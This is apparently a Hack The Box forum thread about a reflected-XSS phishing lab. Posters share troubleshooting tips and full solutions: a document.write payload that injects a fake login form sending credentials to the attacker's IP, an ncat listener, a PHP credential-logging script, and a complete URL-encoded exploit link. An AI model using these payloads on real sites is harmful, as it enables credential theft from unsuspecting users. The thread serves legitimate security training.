Cross-Site Scripting (XSS) Module: "Issue in sending URL!" at the Phishing Section

So I tried the phishing section for the XSS module without walking through most of the examples. Spent several hours trying to figure out why in the heck my payload worked locally (I could see the username and password upon logging in), but NOT with ‘/send.php’.

For whatever reason, I did NOT put ‘name="submit"’ on the ‘input type="submit"’ in the payload. It makes sense why this works locally; the index.php script being used is looking for ‘username’ and ‘password’ fields via the isset() function. I’m pretty sure ‘/send.php’ is looking for “submit” as a conditional. I might be wrong about this, but it makes sense.

tl;dr: just copy the HTML form presented at the top of the page. Make sure each field, including the button, is named.

Complete solution to this challenge: How to Exploit Reflected XSS: The "Surprising" Trick! - YouTube
Hope it helps :))


Insert the XSS above into http://IP_target/phishing/index.php
and then get the resulting URL.

Send it to http://10.129.xx.xxx/phishing/send.php
Before sending, go to cmd and type
ncat -lvnp 8090
You will see the username and password via cmd.


I’m beyond annoyed with this section.

I’m getting the same error. I am using http instead of https. Can you help me please?

I have it working and I also have the flag based on all the discussions on this forum.

Though there is one thing I do not understand.

When one runs XSStrike against the phishing/index.php one of the possible payloads is below.
'><DETaIls%09onPoinTerEnTEr%0d=%0d(confirm)()%0dx//

Let’s say I submit the parameter test; the URL is:
http://10.129.193.135/phishing/index.php?url=test

The source then looks like below.

Based on the XSS payload we know that we need to start our XSS injection payload with '>.

Then let’s submit '>test and the source looks like:
’>

To make this clearer, let’s group this like below:
'>

So essentially by adding the '> as input we complete the img src tag.

So, I would think that in the final payload, when doing the assignment, one would also use the '>.
But in all of these discussions, all of a sudden one needs to use '/>.

Where does the / come from?
Why is the / needed?

Thanks

The forum application system removed the most important info.

Below is an image that shows the source when submitting test
image
http://10.129.193.135/phishing/index.php?url=test

Below is an image that shows the source when submitting '>test
image
http://10.129.193.135/phishing/index.php?url=>'test

So, in the solution, the '> becomes '/>.
Why is that?
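As an added illustration (not part of any post in this thread), the snippet below models the reflection point the question is about: the parameter echoed verbatim inside a single-quoted img src attribute, which is an assumption drawn from the poster's description, not the module's actual source. It shows that with an unescaped reflection both the '> and '/> prefixes put the rest of the input outside the attribute, while attribute-context escaping (html.escape with quote=True) keeps either prefix inside the value.

```python
import html
from html.parser import HTMLParser

# Constructed stand-in for the lab's reflection point (an assumption drawn
# from the thread, not the module's real source): the ?url= value is echoed
# verbatim inside a single-quoted src attribute.
TEMPLATE = "<img src='{url}'>"

# Constructed, harmless probe placed after the prefix under test.
PROBE_TAIL = "<b>injected</b>"


class TagCollector(HTMLParser):
    """Records every start tag a browser-like parser would create."""

    def __init__(self) -> None:
        super().__init__()
        self.tags: list[tuple[str, dict]] = []

    def handle_starttag(self, tag, attrs):
        self.tags.append((tag, dict(attrs)))

    def handle_startendtag(self, tag, attrs):  # e.g. <img ... />
        self.tags.append((tag, dict(attrs)))


def tags_of(markup: str) -> list[tuple[str, dict]]:
    parser = TagCollector()
    parser.feed(markup)
    parser.close()
    return parser.tags


def render_unsafe(url: str) -> str:
    """Reflect the parameter as-is: the context the thread is probing."""
    return TEMPLATE.format(url=url)


def render_safe(url: str) -> str:
    """Escape for an attribute context; quote=True also turns ' into &#x27;."""
    return TEMPLATE.format(url=html.escape(url, quote=True))


def injected(render, prefix: str) -> bool:
    """True if the prefix lets the probe become a real element (a 'b' tag)."""
    return any(tag == "b" for tag, _ in tags_of(render(prefix + PROBE_TAIL)))


if __name__ == "__main__":
    for prefix in ("'>", "'/>"):
        print(repr(prefix), "unsafe:", injected(render_unsafe, prefix),
              "safe:", injected(render_safe, prefix))
```

With the unescaped template both prefixes report an injected element; the only difference is that '/> self-closes the img tag instead of leaving the stray closing quote as visible text.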

My problem here was that I used Proton VPN to access the website; as soon as I turned it off, I got the URL sent.

thanks for the help!

It is fundamental that you write the HTML part as in the example. The placeholders have to be “Username” and “Password”, otherwise the send.php page will not work. The names of the elements have to match as well… This was the problem on my side. Hope this helps.

Hi everyone,

I’ve spent hours on this question. It got on my nerves, and my only problem was that I was using my VM with a VPN and not the Pwnbox. The only thing I changed was the IP and the port.

If anyone on the HTB team is reading this, please fix this issue.

I think this post has saved many comrades from gray hair!!) :slightly_smiling_face:
Thank you friend!!!
This is the best comment!

Yeah, for anyone still attempting this: after about 4 hours of banging my head against the desk I finally figured out that you HAVE to set the IP as your tun0 IP, otherwise it WILL NOT WORK. You don’t have to do any extra encoding. Copying and pasting the URL already encodes it. I attempted it a hundred different ways to no avail, but the very first time I changed the IP to my tun0 it was an instant success. Good luck.

I faced this same issue as I was doing the module. What worked for me was using the Pwnbox that is provided by HTB.
There was no need to encode the URL or parts of it. It just worked. Hope you find this helpful.

Easiest way for me …

> //document.write('<h3>Please login to continue</h3><form action=http://OUR_IP><input type="username" name="username" placeholder="Username"><input type="password" name="password" placeholder="Password"><input type="submit" name="submit" value="Login"></form>');//

Edit OUR_IP with your Pwnbox tun0 IP, with a port of your choice. Paste the payload into phishing/index.php. Once the payload is successfully activated: mkdir /tmp/tmpserver, touch index.php, sudo nano index.php, and paste this PHP:

```php
<?php
// Only act when both form fields from the injected login form arrive.
if (isset($_GET['username']) && isset($_GET['password'])) {
    $file = fopen("creds.txt", "a+");
    fputs($file, "Username: {$_GET['username']} | Password: {$_GET['password']}\n");
    // Send the browser back to the original page after logging the fields.
    header("Location: http://SERVER_IP/phishing/index.php");
    fclose($file);
    exit();
}
?>
```

Edit SERVER_IP with your Pwnbox tun0 IP, then run sudo php -S 0.0.0.0:<port you chose in your payload>. Open a new tab at http://target_Ip/phishing/send.php, copy the URL from your index.php payload tab and paste it into the send.php URL input. Figure the rest out.

There are the following conditions to be met to solve this challenge:

  1. Do not use your own machine with VPN. Use the Pwnbox.
  2. Do not modify /etc/hosts to add a custom domain (e.g., {ip_address} {domain}). Use the given IP address.
  3. You need to encode the malicious URL before using it in /phishing/send.php. You must NOT encode http://{pwnbox_ip}:{port} (Since 80 is being used, you need a different one, e.g., 8080).

In case you still can’t solve the challenge, refer to the encoded URL below:

http://10.129.94.112/phishing/index.php?url=%2F%3E%3Cscript%3Edocument.write%28%27%3Ch3%3EPlease%20login%20to%20continue%3C%2Fh3%3E%3Cform%20action%3Dhttp://10.10.15.83:8080%3E%3Cinput%20type%3D%22username%22%20name%3D%22username%22%20placeholder%3D%22Username%22%3E%3Cinput%20type%3D%22password%22%20name%3D%22password%22%20placeholder%3D%22Password%22%3E%3Cinput%20type%3D%22submit%22%20name%3D%22submit%22%20value%3D%22Login%22%3E%3C%2Fform%3E%27%29%3B%20document.getElementById%28%27urlform%27%29.remove%28%29%3B%3C%2Fscript%3E%3C%21--